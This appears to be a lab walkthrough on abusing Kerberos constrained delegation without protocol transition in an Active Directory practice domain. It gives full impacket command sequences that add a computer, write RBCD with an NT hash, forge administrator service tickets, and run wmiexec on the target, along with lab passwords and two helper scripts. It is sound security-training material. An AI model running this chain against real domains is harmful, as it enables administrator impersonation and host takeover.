# Without protocol transition

To look at this option in the GUI, RDP as Fernando.Alonzo:

```
xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore
```

This gives the following in the Windows GUI:

<figure><img src="/files/rA9gAQ0D4xj3y5Kx512j" alt=""><figcaption></figcaption></figure>
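The same setting can be read from LDAP without an RDP session: the "without protocol transition" case is a populated `msDS-AllowedToDelegateTo` on the account while the `TRUSTED_TO_AUTH_FOR_DELEGATION` bit of `userAccountControl` is clear. The following is an added example (not code from the original page): it classifies accounts from those two attributes. The entries are constructed to mirror the lab (Yonkers$ delegating to http/bronx, as used later on this page); `web01$`, `DC01$` and `files01` are hypothetical comparison values, not hosts from the lab.

```python
# Added example: classify an account's Kerberos delegation setting from the
# LDAP attributes behind the "Delegation" tab. Entries below are constructed;
# with ldapsearch/ldap3 you would feed real attribute values instead.

UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000
UF_SERVER_TRUST_ACCOUNT = 0x00002000
UF_TRUSTED_FOR_DELEGATION = 0x00080000          # "Trust this computer for delegation to any service"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # "Use any authentication protocol" = protocol transition

# Constructed sample: Yonkers$ mirrors the lab (KCD to http/bronx, no protocol
# transition); web01$, DC01$ and files01 are hypothetical comparison entries.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "Yonkers$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "msDS-AllowedToDelegateTo": ["http/bronx"]},
    {"sAMAccountName": "web01$",
     "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["cifs/files01"]},
    {"sAMAccountName": "DC01$", "userAccountControl": UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "Bronx$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT},
]


def classify_delegation(entry: dict) -> str:
    """Return the delegation type of one account from userAccountControl and
    msDS-AllowedToDelegateTo (values may arrive as strings from LDAP, hence int())."""
    uac = int(entry.get("userAccountControl", 0))
    targets = entry.get("msDS-AllowedToDelegateTo") or []
    if uac & UF_TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained with protocol transition"
    if targets:
        return "constrained without protocol transition"
    return "none"


def kcd_without_transition(entries: list) -> dict:
    """Accounts in this page's scenario, mapped to the SPNs they may delegate to.
    S4U2self on these accounts returns a non-forwardable ticket, so a forwardable
    one has to come from elsewhere (on this page: RBCD through a new computer)."""
    return {e["sAMAccountName"]: e["msDS-AllowedToDelegateTo"]
            for e in entries if classify_delegation(e) == "constrained without protocol transition"}


if __name__ == "__main__":
    for e in SAMPLE_ENTRIES:
        print(f"{e['sAMAccountName']:<10} {classify_delegation(e)}")
    print("targets to reach via KCD without protocol transition:", kcd_without_transition(SAMPLE_ENTRIES))
```

Against a live domain, the same two attributes are what `findDelegation.py` (impacket) reports; the point of the classifier is that the absence of the 0x01000000 bit is what forces the RBCD detour described below.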

* A good example of exploitation can be found here: <https://snovvcrash.rocks/2022/03/06/abusing-kcd-without-protocol-transition.html>

> The self-RBCD trick doesn't work anymore. When I was writing this article I tried the self-RBCD without success many times. After multiple tries and failures I asked Charlie (@\_nwodtuhs) what I was doing wrong, because I couldn't find out why this didn't work as expected. He explained to me that the self-RBCD trick didn't work anymore and had been silently patched by Microsoft :'(

* To exploit the constrained delegation here we only need a forwardable TGS as administrator for any service of the account that has the delegation configured (here Yonkers$).
* But if we do an S4U (S4U2self + S4U2proxy) like we did with protocol transition, S4U2self returns a non-forwardable TGS and the attack fails.
* So to get the forwardable TGS we need, we first add a computer account and configure RBCD from the created computer (rbcd\_const$) to the computer that has the delegation set (here Yonkers$). Writing that RBCD entry requires control of Yonkers$, which is why its NT hash is used below.
* With that in place, an S4U2self followed by an S4U2proxy from the added computer yields a forwardable TGS for host/Yonkers as administrator (RBCD, unlike classic constrained delegation, does not require the S4U2self ticket to be forwardable, which is what makes the detour work).
* Once that is done, we have the forwardable ticket to pass to S4U2proxy as Yonkers$, and we can even change the requested service with -altservice.

```
# add computer X (rbcd_const)
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/pablo.sandoval:baseballpanda'

# add rbcd from X (rbcd_const) to constrained (Yonkers)
rbcd.py -delegate-from 'rbcd_const$' -delegate-to 'Yonkers$' -dc-ip 192.168.56.11 -action 'write' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'
```

* Do the S4U2self as rbcd\_const$, followed by the S4U2proxy from rbcd\_const$ to Yonkers (this is the classic RBCD attack):

```
# s4u2self on X (rbcd_const)
getST.py -self -impersonate "administrator" -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'
```

<figure><img src="/files/XURhQ5JO9ztqWb8lxlp2" alt=""><figcaption></figcaption></figure>

```
# s4u2proxy from X (rbcd_const) to constrained (Yonkers)
getST.py -impersonate "administrator" -spn "host/Yonkers" -additional-ticket 'administrator@rbcd_const$@NORTH.newyork.LOCAL.ccache' -dc-ip 192.168.56.11  north.newyork.local/'rbcd_const$':'rbcdpass'
```

<figure><img src="/files/nJR69iXLJJ6ZEo644xFg" alt=""><figcaption></figcaption></figure>
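Before handing the host/Yonkers ticket to the next S4U2proxy, it is worth confirming it actually carries the forwardable flag, since that flag is the whole reason for the RBCD detour (a ticket from S4U2self run directly as Yonkers$ would lack it). The following is an added example, not code from the original page: a dependency-free reader for the MIT ccache v4 format that getST.py writes, reporting the forwardable flag of each credential. The embedded cache is constructed in memory to mirror the two tickets above (session keys and ticket bodies are dummy bytes); `usable_as_additional_ticket` is a helper name introduced here.

```python
# Added example: read a ccache (v4, as written by getST.py) and report which
# tickets are forwardable. The sample cache is constructed below; pass a real
# .ccache path on the command line to inspect one produced by the commands above.
import io
import struct

# Ticket flags as stored in the ccache tkt_flags field (MIT krb5 TKT_FLG_*);
# klist -f and impacket's describeTicket.py decode the same encoding.
TKT_FLG_FORWARDABLE = 0x40000000
TKT_FLG_RENEWABLE = 0x00800000
TKT_FLG_PRE_AUTH = 0x00200000
NT_PRINCIPAL, NT_SRV_INST = 1, 2
REALM = "NORTH.NEWYORK.LOCAL"


def _counted(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def _principal(name_type: int, components: list, realm: str = REALM) -> bytes:
    out = struct.pack(">II", name_type, len(components)) + _counted(realm.encode())
    return out + b"".join(_counted(c.encode()) for c in components)


def _credential(client: bytes, server: bytes, tkt_flags: int) -> bytes:
    """One ccache v4 credential record; key and ticket bytes are dummies."""
    out = client + server
    out += struct.pack(">H", 23) + _counted(b"\x00" * 16)                          # keyblock: RC4 enctype, key
    out += struct.pack(">IIII", 1700000000, 1700000000, 1700036000, 1700604800)  # auth/start/end/renew times
    out += b"\x00" + struct.pack(">I", tkt_flags)                                  # is_skey, tkt_flags
    out += struct.pack(">II", 0, 0)                                                # no addresses, no authdata
    return out + _counted(b"\x61\x00") + _counted(b"")                             # ticket (dummy), second_ticket


def build_sample_ccache() -> bytes:
    """Constructed cache: the S4U2self ticket from rbcd_const$ (not forwardable)
    and the S4U2proxy ticket for host/Yonkers obtained through RBCD (forwardable)."""
    admin = _principal(NT_PRINCIPAL, ["administrator"])
    header = struct.pack(">HH", 0x0504, 12) + struct.pack(">HHII", 1, 8, 0, 0)  # version 4, deltatime tag
    body = admin  # default principal
    body += _credential(admin, _principal(NT_PRINCIPAL, ["rbcd_const$"]),
                        TKT_FLG_RENEWABLE | TKT_FLG_PRE_AUTH)
    body += _credential(admin, _principal(NT_SRV_INST, ["host", "Yonkers"]),
                        TKT_FLG_FORWARDABLE | TKT_FLG_RENEWABLE | TKT_FLG_PRE_AUTH)
    return header + body


class _Reader:
    def __init__(self, data: bytes):
        self.buf, self.size = io.BytesIO(data), len(data)

    def take(self, n: int) -> bytes:
        b = self.buf.read(n)
        if len(b) != n:
            raise ValueError("truncated ccache")
        return b

    def u8(self): return self.take(1)[0]
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def counted(self): return self.take(self.u32())
    def done(self): return self.buf.tell() >= self.size

    def principal(self) -> str:
        _name_type, count = self.u32(), self.u32()
        realm = self.counted().decode()
        return "/".join(self.counted().decode() for _ in range(count)) + "@" + realm


def parse_ccache(data: bytes) -> list:
    """Return one dict per credential: client, server, raw flags, forwardable."""
    r = _Reader(data)
    if r.u16() != 0x0504:
        raise ValueError("only ccache v4 is handled here")
    r.take(r.u16())                          # skip header tags
    r.principal()                            # default principal
    creds = []
    while not r.done():
        client, server = r.principal(), r.principal()
        r.u16(); r.counted()                 # keyblock: enctype, key
        r.take(16)                           # authtime, starttime, endtime, renew_till
        r.u8()                               # is_skey
        flags = r.u32()
        for _ in range(r.u32()): r.u16(); r.counted()   # addresses
        for _ in range(r.u32()): r.u16(); r.counted()   # authdata
        r.counted(); r.counted()             # ticket, second_ticket
        creds.append({"client": client, "server": server, "flags": flags,
                      "forwardable": bool(flags & TKT_FLG_FORWARDABLE)})
    return creds


def usable_as_additional_ticket(creds: list) -> list:
    """Servers whose ticket a classic KCD S4U2proxy (no protocol transition) will accept."""
    return [c["server"] for c in creds if c["forwardable"]]


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_ccache()
    for c in parse_ccache(data):
        print(f"{c['client']} -> {c['server']}: flags=0x{c['flags']:08x} forwardable={c['forwardable']}")
```

Run it as `python3 check_fwd.py 'Administrator@host_yonkers@NORTH.NEWYORK.LOCAL.ccache'` on the file produced above: the host/Yonkers entry must show `forwardable=True` or the next step will be rejected by the KDC. The flag lives in the cache's cleartext credential record (it comes from the KDC-REP enc-part the client decrypted), which is why no key is needed to read it.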

* Then run S4U2proxy as Yonkers$ with the forwardable ticket against the real target:

```
# s4u2proxy from constrained (yonkers) to target (bronx) - with altservice to change the SPN in use
getST.py -impersonate "administrator" -spn "http/bronx" -altservice "cifs/bronx" -additional-ticket 'Administrator@host_yonkers@NORTH.NEWYORK.LOCAL.ccache' -hashes :2634cbdd337c86aa0ecffd1dd457a2a8 -dc-ip 192.168.56.11 north.newyork.local/'yonkers$'

# the saved ticket is for cifs/bronx (the -altservice value), so use it against bronx
export KRB5CCNAME=/workspace/administrator@cifs_bronx@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k -no-pass north.newyork.local/administrator@bronx
```

<figure><img src="/files/cNJ9okL3BzejrXhWB8Aa" alt=""><figcaption></figcaption></figure>

* After the exploit, a little clean-up of the lab: flush the RBCD entry (as Yonkers$) and delete the computer account (here with a domain admin, fernando.alonzo):

```
rbcd.py -delegate-to 'yonkers$' -delegate-from 'rbcd_const$' -dc-ip 192.168.56.11 -action 'flush' -hashes ':2634cbdd337c86aa0ecffd1dd457a2a8' north.newyork.local/'Yonkers$'
addcomputer.py -computer-name 'rbcd_const$' -computer-pass 'rbcdpass' -dc-host 192.168.56.11 'north.newyork.local/fernando.alonzo:IDr1R3allyF@sTF1!' -delete
```

<figure><img src="/files/oxt8V8rHxjzvDYBc0snZ" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/v1NfPcKPVOuY90vzi44w" alt=""><figcaption></figcaption></figure>

